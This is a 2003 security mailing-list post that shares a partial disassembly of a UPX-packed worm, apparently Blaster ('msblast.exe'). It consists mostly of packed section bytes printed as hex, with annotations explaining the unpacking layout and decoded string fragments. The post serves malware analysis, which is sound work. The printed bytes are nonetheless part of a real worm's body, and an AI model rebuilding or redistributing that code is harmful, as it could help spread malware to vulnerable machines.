[Dshield] Worm Disassembly

Chris Ream chrisr at stopthemcold.com
Wed Aug 13 19:22:57 GMT 2003


Ok, I've been getting slammed with requests so here is the disassembly
of one of the worms. I'll post the other one shortly and send my
comments privately to those interested in discussing it.

For those examining it, don't forget that Windows programs written in C
don't actually start executing code at void main(); the startup code first
does several things, like loading environment variables and setting up
argc, before it jumps to the actual code.

-Chris.
chrisr at stopthemcold.com

here it is...

UPX0:00401000 ; Format      : Portable executable for IBM PC (PE)
UPX0:00401000 ; Section 1. (virtual address 00001000)
UPX0:00401000 ; Virtual size                  : 00005000 (  20480.)
UPX0:00401000 ; Section size in file          : 00000000 (      0.)
UPX0:00401000 ; Offset to raw data for section: 00000200
UPX0:00401000 ; Flags E0000080: Bss Executable Readable Writable
UPX0:00401000 ; Alignment     : 16 bytes ?
UPX0:00401000 
UPX0:00401000                 model flat
UPX0:00401000 
UPX0:00401000 ;
------------------------------------------------------------------------
---
UPX0:00401000 
UPX0:00401000 ; Segment type: Pure code
UPX0:00401000 ; Segment permissions: Read/Write/Execute
; UPX0 has no bytes in the file (the header above gives "Section size in file"
; as 0 and every item below is dup(?)), yet it is mapped read/write/execute.
; The start routine in UPX1 writes into this range and finally jumps to
; dword_4011CB (the CODE XREF from start+14F), so the code that actually runs
; here only exists in memory after unpacking. Nothing can be read from this
; segment in a static listing of the packed file.
UPX0:00401000 UPX0            segment para public 'CODE' use32
UPX0:00401000                 assume cs:UPX0
UPX0:00401000                 ;org 401000h
UPX0:00401000                 assume es:nothing, ss:nothing, ds:nothing,
fs:nothing, gs:nothing
UPX0:00401000                 dd 72h dup(?)           ; uninitialised; filled at run time
UPX0:004011C8                 db 3 dup(?)
UPX0:004011CB dword_4011CB    dd 138Dh dup(?)         ; CODE XREF:
start+14Fj
UPX0:00405FFF                 db ?
UPX0:00405FFF UPX0            ends
UPX0:00405FFF 
UPX1:00406000 ; Section 2. (virtual address 00006000)
UPX1:00406000 ; Virtual size                  : 00002000 (   8192.)
UPX1:00406000 ; Section size in file          : 00001400 (   5120.)
UPX1:00406000 ; Offset to raw data for section: 00000200
UPX1:00406000 ; Flags E0000040: Data Executable Readable Writable
UPX1:00406000 ; Alignment     : 16 bytes ?
UPX1:00406000 ;
------------------------------------------------------------------------
---
UPX1:00406000 
UPX1:00406000 ; Segment type: Pure code
UPX1:00406000 ; Segment permissions: Read/Write/Execute
UPX1:00406000 UPX1            segment para public 'CODE' use32
UPX1:00406000                 assume cs:UPX1
UPX1:00406000                 ;org 406000h
UPX1:00406000                 assume es:nothing, ss:nothing, ds:nothing,
fs:nothing, gs:nothing
UPX1:00406000                 dd 0D3EE825Fh, 543074h, 11D100h, 2C2000h,
12600h
UPX1:00406014                 db 3Dh
; dword_406015 is the address the start routine loads into esi (DATA XREF
; start+1) and reads from while it fills UPX0, so these dwords are the input of
; the unpacking loop, not instructions or plain data. The first dword is the
; first value loaded into the bit buffer (mov ebx, [esi] at loc_407212).
; The dd values are little-endian: the byte order in memory is the reverse of
; what is printed.
UPX1:00406015 dword_406015    dd 0FFF2FFFEh, 8B40C031h, 0F704244Ch,
60441h, 448B0F74h
UPX1:00406015                                         ; DATA XREF:
start+1o
UPX1:00406015                 dd 548B0824h, 2891024h, 0FFB903B8h,
0C310EF77h, 12575653h
UPX1:00406015                 dd 0FE6A5010h, 40100068h, 35FF6400h,
0DDDBFF15h, 258906B9h
UPX1:00406015                 dd 588B2019h, 830C702Fh, 2074FFFEh,
0D97F743Bh, 2424FFDCh
UPX1:00406015                 dd 348D1A74h, 0B30C8B76h, 7C481754h,
750004B3h, 0BFFF77D7h
UPX1:00406015                 dd 0B354FFFFh, 64D1EB08h, 8335058Fh,
5E5F0CC4h
UPX1:00406089 ;
------------------------------------------------------------------------
---
; NOTE(review): these instructions lie inside the packed stream (dd runs on
; both sides, no CODE XREF on any line), so this is most likely the
; disassembler decoding data as code. The start routine copies some stream
; bytes to the output unchanged (loc_407208), which would explain why short,
; plausible sequences (pop/retn, push ebp / mov ebp, esp) show through next to
; nonsense such as "pop esp" and "in al, dx". Treat the whole range as data;
; nothing in the visible listing transfers control here.
UPX1:00406089                 pop     ebx
UPX1:0040608A                 retn
UPX1:0040608B ;
------------------------------------------------------------------------
---
UPX1:0040608B                 push    ebp
UPX1:0040608C                 mov     ebp, esp
UPX1:0040608E                 pop     esp             ; not meaningful as code
UPX1:0040608F                 push    ebp
UPX1:00406090                 push    0
UPX1:00406092                 mov     esi, 16EEFFBh
UPX1:00406097                 push    75FF5A92h
UPX1:0040609C                 or      al, ch
UPX1:0040609E                 add     [eax], eax
UPX1:004060A0                 adc     eax, [eax+5Dh]
UPX1:004060A3                 sbb     al, 89h
UPX1:004060A5                 in      al, dx          ; port I/O: not meaningful as code
UPX1:004060A6                 pop     ebp
UPX1:004060A7                 retn
UPX1:004060A7 ;
------------------------------------------------------------------------
---
UPX1:004060A8                 dd 0FFFB7BFCh, 0EC8320EEh, 5D8B2308h,
8458B0Ch, 254030A3h
UPX1:004060A8                 dd 5341D89h, 0B63F6B7Bh, 75AE40F7h,
0F8458972h, 0FC45AC19h
UPX1:004060A8                 dd 77FB16A3h, 0D8DEDFBh, 8BFC4389h,
87B2D73h, 0C8D6291h
UPX1:004060A8                 dd 0D6EE8176h, 748F65FEh, 8D55563Ah,
0B86106Bh, 5B4D5E5Dh
UPX1:004060A8                 dd 9FDD6B6h, 782874C0h, 72532531h,
1D047691h, 0AC65BBF7h
UPX1:004060A8                 dd 81C0C56h, 8F048B36h, 300C438Bh,
5CFF0BBFh, 340F2508h
UPX1:004060A8                 dd 2CACEB8Fh, 6A4771EBh, 0DBDD76FFh,
0BC0C2A61h, 7A1005C7h
UPX1:004060A8                 dd 0B6A8E0Bh, 0ECCDD873h, 5F181440h,
8192175h, 0C80EEFB7h
UPX1:004060A8                 dd 3BB80708h, 8327EB00h, 502AA1F8h,
0AF61B2Eh, 0D1E2450h
UPX1:004060A8                 dd 210FBA00h, 0F2894E6h, 1A2C3D83h,
0DEDECF00h, 0A1E83EC3h
UPX1:004060A8                 dd 0E0FF720Eh, 64D71058h, 870CDDA1h,
9E355DA1h, 551B1C68h
UPX1:004060A8                 dd 668410B3h, 49AA509Ah, 0FFB82310h,
0E865897Fh, 243CD950h
UPX1:004060A8                 dd 240C8166h, 2CD90300h, 287F6324h,
7DF67B5Eh, 2004242Eh
UPX1:004060A8                 dd 89A0137Eh, 17B6CF14h, 162405D9h,
121C1448h, 0F7F1D750h
UPX1:004060A8                 dd 3118376Fh, 0FC4D89C9h, 0C9B82A50h,
65A311C3h, 0DFC73787h
UPX1:004060A8                 dd 0EC817EC3h, 316C3AACh, 0EF916AF6h,
50BBB98Eh, 0F003F5Fh
UPX1:004060A8                 dd 485D6A66h, 265h, 0DF1D9E80h, 326A883Fh,
1C63C68h, 0F8484904h
UPX1:004060A8                 dd 7B07D9BEh, 687C0794h, 0D1D4843h,
1EC7E14Ch, 3D0404FEh
UPX1:004060A8                 dd 1207F9B7h, 858DD412h, 0D86BE860h,
50FF76B9h, 11105251h
UPX1:004060A8                 dd 142FDAFCh, 0F25C82Dh, 4C1A0101h,
618DEDF7h, 0FFC82211h
UPX1:004060A8                 dd 6C050BE9h, 0B1270468h, 0F936E637h,
10676930h, 63C6DBB7h
UPX1:004060A8                 dd 4412C35Bh, 4E1A0CAFh, 0EB581347h,
3BFBFB91h, 312C25FBh
UPX1:004060A8                 dd 21340D40h, 5593014h, 95FEB90Ch,
0BFEE617Bh, 89F9F799h
UPX1:004060A8                 dd 3D8947D7h, 15154A14h, 0D33E3538h,
0A44192B9h, 0E484FC86h
UPX1:004060A8                 dd 3BD84FB9h, 0F0840F01h, 89CC1400h,
0D80B5C85h, 77AD993Eh
UPX1:004060A8                 dd 3943D619h, 7CA0B00h, 45FE36D9h,
92408B04h, 13542C30h
UPX1:004060A8                 dd 0FB615BE8h, 0BB5FFDEh, 40EE7837h,
9CBD492Bh, 573DFDECh
UPX1:004060A8                 dd 3E68247Dh, 48145A10h, 0B61F7BDEh,
0A3AC3958h, 0F4219128h
UPX1:004060A8                 dd 0C8F21585h, 0FC30101Ch, 0A573784Ah,
0BD3C8A3Ch, 81F7E14h
UPX1:004060A8                 dd 0E4F7DF0Fh, 23152914h, 0FA365A1h,
38DB0AA1h, 6A3527Ch
UPX1:004060A8                 dd 0F354617h, 837ED4B7h, 27D0CFAh,
28343920h, 21F673D6h
UPX1:004060A8                 dd 70A1D67h, 21B0A7Eh, 784AF253h,
3C75F609h, 1031287Ch
UPX1:004060A8                 dd 95BF0B0h, 36A9C8Fh, 0AD18F4E6h,
3C36B78Fh, 28099AE6h
UPX1:004060A8                 dd 2C94BC54h, 0F018F8DFh, 0F61F2F3Ah,
5903236Fh, 0F7F0FFCh
UPX1:004060A8                 dd 57F07D8Dh, 167E080Eh, 1EC766FBh,
1EC12F34h, 4701B38h
UPX1:004060A8                 dd 0BDF5A97Ah, 0F9EB7307h, 0CC40083Fh,
0C910C2C9h, 254EE4CDh
UPX1:004060A8                 dd 0EB93552Ch, 0FC384038h, 232BAD0h,
0A3C0CC01h, 0F8416024h
UPX1:004060A8                 dd 451EFBA3h, 85916A19h, 7F81FDD8h,
0F4AED8DBh, 0FC76677h
UPX1:004060A8                 dd 30451B02h, 9AC28954h, 66F77739h,
11DA9589h, 5DCA583h
UPX1:004060A8                 dd 3B333032h, 4A5FE7BEh, 8553D823h,
46D93AF6h, 10F866BAh
UPX1:004060A8                 dd 6508D09h, 18EC26E8h, 0A104B9DDh,
8438FBD4h, 0DF77A74Eh
UPX1:004060A8                 dd 8C0F0188h, 0DB312FBCh, 2BBF3768h,
0FAEC7CD0h, 89B2D089h
UPX1:004060A8                 dd 439EABC6h, 0ACB9BB96h, 89FC8B37h,
838A25D8h, 0B2E6A74Ch
UPX1:004060A8                 dd 756FE15h, 832817D4h, 0FE00D1DCh,
83C7C4DCh, 0C6BD936Ch
UPX1:004060A8                 dd 90CF04C7h, 0FCC4578Fh, 85DDF483h,
227C8BA8h, 91038468h
UPX1:004060A8                 dd 0BF1BA681h, 73B2FFBFh, 0C40D560Bh,
5EB3A59h, 0EC163AD3h
UPX1:004060A8                 dd 1B4806C6h, 11130E74h, 0BACE8805h,
38B95CCCh, 42F04A40h
UPX1:004060A8                 dd 142E9CE0h, 955B941Eh, 0DB3D818Dh,
7E9DF9B6h, 0E70F7E22h
UPX1:004060A8                 dd 0EB30052Dh, 872C0708h, 472CCF6Ch,
303B3022h, 98F6E419h
UPX1:004060A8                 dd 3010185Eh, 23DB2122h, 8A301072h,
18E42831h, 2807CB3Fh
UPX1:004060A8                 dd 0C396EBh, 0C610018Ch, 9045F08Ah,
0E19476FDh, 16B7704Eh
UPX1:004060A8                 dd 8768DA0Ch, 0F8C63F1Ah, 755F1D20h,
25FF3196h, 0BD448901h
UPX1:004060A8                 dd 0A3A61BB0h, 2603DF35h, 0FF90B458h,
7E2F835Ah, 57800466h
UPX1:004060A8                 dd 47603313h, 0D9DBFF83h, 7C14E51Eh,
35C383CEh, 630F3005h
UPX1:004060A8                 dd 3010239Dh, 0D22B04h, 4820EB0Fh,
0C181323h, 35ED6C11h
UPX1:004060A8                 dd 0AC5912C6h, 0B8AF985h, 6DAF60E4h,
0A4A6980Eh, 0DB141261h
UPX1:004060A8                 dd 0A07C20B7h, 8F070868h, 0A465836Bh,
0FBA80300h, 0A52E19D3h
UPX1:004060A8                 dd 7406DE78h, 0B58B19EBh, 0FBBD8D08h,
385C8BF6h, 7CB59C39h
UPX1:004060A8                 dd 0FF14740Ah, 0DB851285h, 28F63B03h,
0D9720B39h, 7C1C750Dh
UPX1:004060A8                 dd 72762D40h, 391773D9h, 8723FF89h,
0D3BD223Eh, 0B1750A4h
UPX1:004060A8                 dd 0B1901F77h, 7D6C21F0h, 0EBF0000Bh,
0C98C4539h, 0E98B475Ch
UPX1:004060A8                 dd 3B7CE606h, 4D838BBh, 805F20B6h,
25091139h, 0E64BC6DCh
UPX1:004060A8                 dd 0F5D93ACEh, 59C3312Eh, 0B11E3C3Fh,
72934B8h, 5E13B5B4h
UPX1:004060A8                 dd 0F0D73733h, 760653EAh, 178712ACh,
0BDA975C1h, 41A96EDBh
UPX1:004060A8                 dd 1CEC6838h, 0EB0B139Dh, 93EDCDC7h,
18759F0Ah, 8DA4BD32h
UPX1:004060A8                 dd 348EC035h, 0B96EDB9Fh, 0A5F39B12h,
8E74412h, 3483D841h
UPX1:004060A8                 dd 0EDE8839Fh, 8044468h, 9E79073Ch,
0F40F78E7h, 7CD2B4EAh
UPX1:004060A8                 dd 0D8B3F20Eh, 0C4780E6h, 20D6CE0Dh,
3AECA638h, 0C86DBA35h
UPX1:004060A8                 dd 0D090EB18h, 2562CC27h, 0F52E77BBh,
21820360h, 0F8EBF000h
UPX1:004060A8                 dd 0EFFCE57Eh, 8C85811Ch, 0EF8B6366h,
5D7C8AF7h, 890A0509h
UPX1:004060A8                 dd 60721C68h, 539B06Fh, 0E703E2Eh,
56AD917Bh, 7026AACCh
UPX1:004060A8                 dd 4874D6E4h, 3C01063Ch, 2EE70823h,
3CBC85CFh, 0D8307806h
UPX1:004060A8                 dd 9242D9E6h, 48BB784Bh, 0CD9DED26h,
0A606A8EFh, 2C0F008h
UPX1:004060A8                 dd 64B9100Ah, 101092E4h, 464B8080h,
8484192Eh, 92E464B4h
UPX1:004060A8                 dd 0B8B8B491h, 1C92F1D0h, 0F18CD0B9h,
0CE30690Ah, 0F84896D6h
UPX1:004060A8                 dd 4F9C1DA4h, 17B56BDEh, 0AFED1B21h,
0E660EBC9h, 10A01FC8h
UPX1:004060A8                 dd 21E68F0h, 5CD22903h, 721EB9FAh,
21EDCA0Ch, 0EDC80274h
UPX1:004060A8                 dd 42DEBB21h, 115C420Fh, 0CBB9B7CBh,
14CABDC7h, 6C450C5Ah
UPX1:004060A8                 dd 0CD6216C4h, 0E8B2E21h, 5E91CCD7h,
0A44F4D9Bh, 0ACDEEC69h
UPX1:004060A8                 dd 56E6320h, 0B3926C24h, 0D44F0DC9h,
5FD886E6h, 0AB42C9D8h
UPX1:004060A8                 dd 2C49D8D4h, 641B60Fh, 0DF85DEE9h,
0DDDE0712h, 9F590D28h
UPX1:004060A8                 dd 931F68DCh, 2025430h, 0C9B71D4Bh,
8E40C00Bh, 0CC5ED9C4h
UPX1:004060A8                 dd 3D157673h, 0C25B3B1Ah, 615884C0h,
9E84726Fh, 100C684Bh
UPX1:004060A8                 dd 4657EDFCh, 0E56DE8EFh, 400A0E8Dh,
57013C80h, 0CAE92C4Fh
UPX1:004060A8                 dd 0FCAEF9h, 0F587F59Ch, 3E86824h,
0BEBDBE8h, 9646D068h
UPX1:004060A8                 dd 43F687FAh, 7D0AFB83h, 0E738A209h,
0CECA6408h, 0C6D0272h
UPX1:004060A8                 dd 0F65B3C90h, 4C5B527Ch, 787647FEh,
83475B2Fh, 1D4114BDh
UPX1:004060A8                 dd 4D838F0Eh, 1F74B1F0h, 4482338Ch,
6429F840h, 5C083562h
UPX1:004060A8                 dd 0C03BD936h, 0F8162825h, 53C0A017h,
244CE896h, 0EBD2310Ch
UPX1:004060A8                 dd 0EB7FFE0Dh, 0C383EF97h, 0EEB70F02h,
2E983C2h, 7F01F983h
UPX1:004060A8                 dd 74C909EEh, 0DF12F105h, 1003D316h,
0E9C1D189h, 0E381D3E2h
UPX1:004060A8                 dd 7FB1FC58h, 1CA8910h, 0CA0110DAh,
0D0F7D089h, 0F028D924h
UPX1:004060A8                 dd 99561080h, 963ACD08h, 83CAC738h,
0F8101AA7h, 164D435Dh
UPX1:004060A8                 dd 0EC05EEC6h, 468B09EBh, 0E2478B0Ch,
38ABDEDBh, 5D81F889h
UPX1:004060A8                 dd 0FC445135h, 0CFDA9801h, 47EC9F0Fh,
59870E40h, 0C8DB2C30h
UPX1:004060A8                 dd 5C197B92h, 34120337h, 805819C7h,
475C41Dh, 0C31534C9h
UPX1:004060A8                 dd 0B00F173Eh, 0B4616602h, 0ECDA9318h,
56571BE0h, 6A320F0Ch
UPX1:004060A8                 dd 2448F614h, 21EDB18Bh, 2EBE29F0h,
9CE451B0h, 929C0400h
UPX1:004060A8                 dd 7AB47B0h, 7E77494Dh, 236E2366h,
947C0346h, 7DED1768h
UPX1:004060A8                 dd 0FF874672h, 13BD8B52h, 89645AC9h,
389E1064h, 0D4D90C33h
UPX1:004060A8                 dd 6ED09824h, 77E2E9FFh, 0FF6EFF2Eh,
20C389DFh, 0B3493880h
UPX1:004060A8                 dd 0E06E6E42h, 0ECBB827Dh, 8A8965Fh,
0EC45C684h, 16286A45h
UPX1:004060A8                 dd 0ADDB2FEEh
UPX1:004068A8                 dd 0DF0AD75h, 1C6AF205h, 0F50380F4h,
0B91CC6CAh, 30110D06h
UPX1:004068A8                 dd 0B2E949FCh, 0C7DAE25Bh, 50E42AE0h,
954102E5h, 74732EEh
UPX1:004068A8                 dd 0EA3AE61Bh, 0D3CB6DD8h, 94FCE840h,
992D9825h, 1FA93C06h
UPX1:004068A8                 dd 9A263576h, 0A3F85D89h, 0F6503E8h,
0C78183BFh, 0F5E7810Ah
UPX1:004068A8                 dd 86152957h, 24D8C20Ch, 6CDB1B64h,
0C10AFF61h, 0C70910E7h
UPX1:004068A8                 dd 0DC5B0D2Ch, 2F17B60Ch, 0F50C6A90h,
1B049C03h, 7ADAD9A4h
UPX1:004068A8                 dd 20A8D80Eh, 62C6CA19h, 633C0E07h,
4C2EEC1Fh, 0B0E41A1Eh
UPX1:004068A8                 dd 11C48204h, 3B2B0B92h, 7B10F63Bh,
781EB43Dh, 2A7E800Bh
UPX1:004068A8                 dd 20D23E17h, 0FF17A854h, 2F51C825h,
90199090h, 0B1504CDh
UPX1:004068A8                 dd 1901D0CCh, 0D8D40190h, 90190190h,
19E4E0DCh, 0E8190190h
UPX1:004068A8                 dd 1901F0ECh, 0F8F40190h, 901C9720h,
45200FCh, 32032032h
UPX1:004068A8                 dd 4A100C08h, 14032032h, 0F97F8D20h,
12AB9270h, 223F80ECh
UPX1:004068A8                 dd 226A2375h, 6AF826E1h, 3C0940A4h,
727D4530h, 29B7DBFFh
UPX1:004068A8                 dd 1EB471Bh, 74201F47h, 471CEBFAh,
1407BE0Fh, 5F732F02h
UPX1:004068A8                 dd 7520F8DFh, 740E16F3h, 0BF85D3F3h,
0CD1C74B6h, 2440957h
UPX1:004068A8                 dd 0BF5F5F4Ch, 59A5CB7Fh, 2D10007Fh,
24048504h, 0EB73073Dh
UPX1:004068A8                 dd 0DDB1901Bh, 0FF0BC429h, 302C9BE1h,
9019010Bh, 90383401h
UPX1:004068A8                 dd 3C901901h, 90194440h, 4C481901h,
90190150h, 90585401h
UPX1:004068A8                 dd 5C901901h, 90196C60h, 74701901h,
90190180h, 90888401h
UPX1:004068A8                 dd 8C901901h, 90199490h, 9C981901h,
901901A0h, 90A8A401h
UPX1:004068A8                 dd 0AC901901h, 445B4B0h, 0B81936h,
408B00A8h, 0FCB215F9h
; Readable ASCII shows through the packed stream in this range. Read each dword
; little-endian (lowest byte first): 6C62736Dh 2E747361h 657865h spell
; "msblast.exe" plus a terminating zero. The dwords after it carry pieces of
; two text messages, interrupted by non-text bytes, so they are fragments and
; not complete strings; the full text is only present after unpacking.
; NOTE(review): the file name matches the one reported for the Blaster/Lovsan
; worm active at the date of this post -- confirm against the sample itself.
; A strings scan of the packed file will find the name but not the messages.
UPX1:004068A8                 dd 4030A9h, 8040313Ch, 7FFFEDF6h,
6C62736Dh, 2E747361h ; "msbl" "ast."
UPX1:004068A8                 dd 657865h, 756A2049h, 6177200Ah,
0FFED046Eh, 6F74FFFFh ; first line: "exe",0  "I ju"; last dword ends in "to"
UPX1:004068A8                 dd 79617320h, 564F4C20h, 4F592045h,
41532055h, 21214Eh ; " say" " LOV" "E YO" "U SA" "N!!",0
UPX1:004068A8                 dd 6C6C6962h, 6DB7FD14h, 746167FBh,
68267365h, 79256409h ; first line: "bill" ... "gat" (after one non-text byte)
UPX1:004068A8                 dd 6D20756Fh, 0DA656B61h, 31BB7ED6h,
70146968h, 6973736Fh ; first line: "ou m" "ake"; this line ends "ossi"
UPX1:004068A8                 dd 313F0D51h, 0DBFB7B5Bh, 69197042h,
6F06676Eh, 572D656Eh
UPX1:004068A8                 dd 0DBDBBB64h, 696620F7h, 5D723278h,
6974666Fh, 5556572h
UPX1:004068A8                 dd 9A6F3D00h, 10030BEEh, 0D07F489Bh,
116D016h, 0EED9D9CFh
UPX1:004068A8                 dd 1A00103h, 4606C0ABh, 0FE2AE604h,
8A885DFFh, 11C91CEBh
UPX1:004068A8                 dd 8E89Fh, 6048102Bh, 9EFB474Bh,
0E800C8E5h, 3F03E503h
UPX1:004068A8                 dd 0FFFF1704h, 4B06AC5Fh, 58243200h,
6445CCFDh, 0DD70B049h
UPX1:004068A8                 dd 962C74AEh, 3EE960D2h, 0D5ED937h,
470B701Bh, 9B00137Ch
UPX1:004068A8                 dd 10A6FFFFh, 0F1F19680h, 11CE4D2Ah,
20006AA6h, 0F4726EAFh
UPX1:004068A8                 dd 11414D0Ch, 52D87EFFh, 0F00D3342h,
0A807BAADh, 0B2000BF4h
UPX1:004068A8                 dd 36339BE6h, 4F451F03h, 0B7A20457h,
1D95DD60h, 30C70338h
UPX1:004068A8                 dd 0F8172813h, 1EDBB66h, 0CCCB10h,
174300C8h, 9A401FD8h
UPX1:004068A8                 dd 702BF41h, 0CD28C4h, 0EC5F6436h,
0BCD2964h, 0AB73B91Fh
UPX1:004068A8                 dd 2432430Fh, 0A4A6A543h, 24324324h,
69A6AAADh, 60732FBAh
UPX1:004068A8                 dd 40905803h, 9AF7B019h, 0D3DB7820h,
20550D7h, 0B64FBEE9h
UPX1:004068A8                 dd 0FF2088h, 8FC8400h, 3485F87h, 9060066h,
1B07BC02h, 72B10D8h
UPX1:004068A8                 dd 0B30C1978h, 64FFFDDCh, 98D8701Bh,
0D24F9893h, 0BE3DA911h
UPX1:004068A8                 dd 3257B257h, 6C273100h, 0E7809309h,
12431800h, 0F14073DEh
UPX1:004068A8                 dd 31F703FFh, 0C0E48640h, 0FFFF613Bh,
0C581DB83h, 0E800317h
UPX1:004068A8                 dd 99994AE9h, 6F508AF1h, 0E302857Ah,
1B01846Ch, 6E5F30E7h
UPX1:004068A8                 dd 27B26C23h, 0DDAD879h, 0B0C2F20h,
97630703h, 0E94606C5h
UPX1:004068A8                 dd 2E7F103Fh, 8533617h, 0E6847h,
1B8B68A3h, 0B8F65B0h
UPX1:004068A8                 dd 5C075F77h, 0E86FEE01h, 2400431Eh,
332D3105h, 35003400h
UPX1:004068A8                 dd 0C10B3600h, 1641B7Eh, 6F006473h,
31936300h, 4EEF652Ch
UPX1:004068A8                 dd 0B074200h, 0FB080B03h, 0E0CC27FEh,
90037FFDh, 77FDDF00h
UPX1:004068A8                 dd 5E19EBFFh, 0E981C931h, 3681B989h,
9432BF80h, 0BFCEE81h
UPX1:004068A8                 dd 5EBF2E2h, 0FDBFFEE8h, 308E2BBh,
741F0653h, 1A957557h
UPX1:004068A8                 dd 897F92BBh, 0B1CE1A5Ah, 0BEE17CDEh,
0DFFFB7F6h, 3AF90926h
UPX1:004068A8                 dd 9FD7B66Bh, 0DA71854Dh, 1D3681C6h,
0F85AB3C6h, 0DDF907ECh
UPX1:004068A8                 dd 0B3FCFFFFh, 0E8F01C8Dh, 0DFA641C8h,
88C2CDEBh, 33907436h
UPX1:004068A8                 dd 240C7EE6h, 23FFAD7Ch, 4C2219BFh,
0DACC624Ch, 0E2CDAB8Ah
UPX1:004068A8                 dd 79F9D784h, 0FCF3847Ch, 9ADAD8CFh,
9DEBA70Fh, 6ADA1275h
UPX1:004068A8                 dd 47E4A380h, 8E96FE46h, 7ADA78F0h,
56AE399Fh, 8CFF4ADAh
UPX1:004068A8                 dd 0D79B67FCh, 0DAF606DDh, 0EDD5975Ah,
0DFDAC646h, 2A91FDDDh
UPX1:004068A8                 dd 16B0193h, 66BBA253h, 7FB381FCh,
0D0C42AE9h, 0FFFFFFF9h
UPX1:004068A8                 dd 0D0D462EFh, 0D66B62FFh, 0D74CB9A3h,
80965AE8h, 4C1F6EAEh
UPX1:004068A8                 dd 0D3C524D5h, 0D7B46440h, 0BFFFFFECh,
63E8A47Dh, 1F1A27C7h
UPX1:004068A8                 dd 0EC57D750h, 0F75ABFE5h, 1D1CDBEDh,
78B18FE6h, 740E32D4h
UPX1:004068A8                 dd 0B0FFFFFFh, 5D017FB3h, 3F277E03h,
0D0F44262h, 6A76AFA4h
UPX1:004068A8                 dd 1D0F9BC4h, 37A9BD4h, 0FE5E5D7Eh,
0C41962DFh, 0D0C0229Bh
UPX1:004068A8                 dd 0EAC563EEh, 2C97FBEh, 0DB7F22E9h,
0CD5BDCBEh, 0B98B16Bh
UPX1:004068A8                 dd 93736577h, 64EA945Fh, 158F21F0h,
8B6FF6FEh, 0ECF23A80h
UPX1:004068A8                 dd 1772348Ch, 0B392ECFh, 0FF263AD7h,
0BBFFFFFh, 8A170BA0h
UPX1:004068A8                 dd 0B9BF8094h, 0F0E2DE51h, 67EC8090h,
5E34D7C2h, 773498B0h
UPX1:004068A8                 dd 37EB0BA8h, 0FF85DBECh, 0B96A83F2h,
83B468DEh, 0C9A6D162h
UPX1:004068A8                 dd 4A839334h, 0F6CB7CDBh, 0F28CFFFFh,
467BBA38h, 3F704193h
UPX1:004068A8                 dd 0C0547897h, 269BFCAFh, 0B02361E1h,
0FFFEEE54h, 0F48C1FFFh
UPX1:004068A8                 dd 0BC9CCEB9h, 34841FEFh, 0BD6B5131h,
6A0B5401h, 0E4DDCA6Dh
UPX1:004068A8                 dd 4A22F57h, 9264691Fh, 0B72D2057h,
0C2A88h, 907B1AC0h
UPX1:004068A8                 dd 0C8C2802h, 0BFEB0707h, 77018944h,
7377744Eh, 0A2647075h
UPX1:004068A8                 dd 84137FC4h, 6D6F632Eh, 0A732500h,
0E251B500h, 0B349512Bh
UPX1:004068A8                 dd 0D8557409h, 752EEF63h, 200B692Dh,
12544547h, 22E6425h
UPX1:004068A8                 dd 7E43EB53h, 2E692500h, 0B1627200h,
9636C38Fh, 7C412E5Ch
UPX1:004068A8                 dd 5C594749h, 12C4CCFFh, 62FE75A8h,
464F5300h, 13EC5754h
UPX1:004068A8                 dd 45F006FFh, 63694D5Ch, 5CB56F72h,
945B2657h, 435CF128h
UPX1:004068A8                 dd 562BBFC6h, 0C4A25EBDh, 0E0F37265h,
9275525Ch, 85054902h
UPX1:004068A8                 dd 2F595E00h, 0FF561422h, 5792565Ch,
56784AF2h, 17B65604h
UPX1:004068A8                 dd 55A8BC91h, 0C80352C0h, 69A69A6Ch,
0FCF0E4D8h, 34D35308h
UPX1:004068A8                 dd 1C10B34Dh, 4D48382Ch, 504D34D3h,
90807060h, 0DB2EC09Ch
UPX1:004068A8                 dd 53BCAC34h, 0A60BCC57h, 0E866BB33h,
54084FF8h, 0A69A3003h
UPX1:004068A8                 dd 58409A69h, 988C7C6Ch, 69A6D977h,
54C4B0A8h, 9D13D43Fh
UPX1:004068A8                 dd 0E44D203Bh, 4B550CF8h, 4D342403h,
382C34D3h, 0D3544840h
UPX1:004068A8                 dd 60D34D34h, 887C7068h, 4DB2AAB6h,
0FB559C90h, 41390203h
UPX1:004068A8                 dd 1B405015h, 5B2D91B2h, 99132800h,
39900B2h, 25CC3C47h
UPX1:004068A8                 dd 7203986Ch, 8111030Fh, 1608854h,
0C16C082h, 9B2FFF93h
UPX1:004068A8                 dd 1422CA8h, 74697845h, 636F7250h,
4B737365h, 54FDBFC0h
UPX1:004068A8                 dd 61657268h, 65470B64h, 6D6F4374h,
0DB4C806Dh, 69F6344Bh
UPX1:004068A8                 dd 1041656Eh, 6F46DD44h, 0DB741472h,
0F67016Eh, 7245064Ch
UPX1:004068A8                 dd 0F60D723Dh, 4D1FB6DEh, 6C75646Fh,
4E03691Fh, 13316D61h
UPX1:004068A8                 dd 4DD7FB05h, 116C4548h, 736F6C43h,
0B7B7E80Dh, 69541E8Fh
UPX1:004068A8                 dd 75656B63h, 520D746Eh, 6E556C74h,
0B9CE6EDBh, 6881254Dh
UPX1:004068A8                 dd 7803754Dh, 0DBB5AE33h, 652B53ADh,
65540670h, 0D9171D77h
UPX1:004068A8                 dd 0A061B366h, 0B5D00D25h, 0A7EC7B37h,
6765526Ch, 79654B65h
UPX1:004068A8                 dd 5BF7260Ch, 450DBEF7h, 7653104Ch,
756C6156h, 0F7DB0F65h
UPX1:004068A8                 dd 0C2363669h, 0AD5F5F80h, 33416161h,
72C3370Bh, 6F320967h
UPX1:004068A8                 dd 5650F69h, 77BBDCCDh, 74F6366h,
6E65706Fh, 0AEB57E06h
UPX1:004068A8                 dd 6DE1BEC5h, 7797063h, 3B72251Ch,
0ED7F6DDBh, 73C10624h
UPX1:004068A8                 dd 6CAA6769h
UPX1:004070A8                 dd 51727007h, 77307B58h, 17086674h,
0B0637274h, 0D9A7B507h
UPX1:004070A8                 dd 7E6B60B6h, 254920CDh, 0B6846DB7h,
75476EDFh, 0E63086Eh
UPX1:004070A8                 dd 66B65364h, 0B874B9B3h, 41C8D923h,
0DF6E3268h, 9AE850B6h
UPX1:004070A8                 dd 732AAC69h, 69756B04h, 75BB05BBh,
648E5F33h, 6F460A72h
UPX1:004070A8                 dd 576E8461h, 763F9B68h, 6568BDA6h,
0D7DE4B6Ch, 7E077BDEh
UPX1:004070A8                 dd 74072005h, 0B06DB740h, 4919CFD7h,
0E6680467h, 0EC166274h
UPX1:004070A8                 dd 0B879B6ECh, 6962C76Dh, 1F731214h,
2E066116h, 9F415357h
UPX1:004070A8                 dd 36B5F6C5h, 0B707576h, 0BE06643h,
0B98DBD63h, 2E3A6C42h
